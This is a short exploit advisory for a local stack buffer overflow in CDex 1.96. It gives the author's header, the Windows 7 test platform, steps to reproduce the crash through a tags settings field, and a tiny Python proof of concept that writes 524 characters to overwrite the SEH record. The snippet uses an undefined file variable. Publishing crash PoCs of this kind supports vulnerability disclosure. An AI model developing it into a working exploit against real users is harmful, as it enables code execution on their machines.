CDex 1.96 Stack Buffer Overflow

CDex version 1.96 suffers from a local stack buffer overflow vulnerability.

MD5 | d81dc1a4ab91adc10b15ae556ba4dc07


# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: CDex 1.96 - Local Stack Buffer Overflow
# Date: 17-12-2017
# Vulnerable Software: CDex 1.96 (Unicode Build)
# Vendor Homepage:
# Version: v1.96
# Software Link:
# Tested On: Windows 7 x32
# PoC: generate crash.txt, open app, go to options, settings, encoding, tags, paste crash.txt contents in picture text
# app crashes; 00420042 Pointer to next SEH record; no unicode ppr pointers


crash = "A"*520 + "B"*4 #seh

writeFile = open (file, "w")
writeFile.write( crash )

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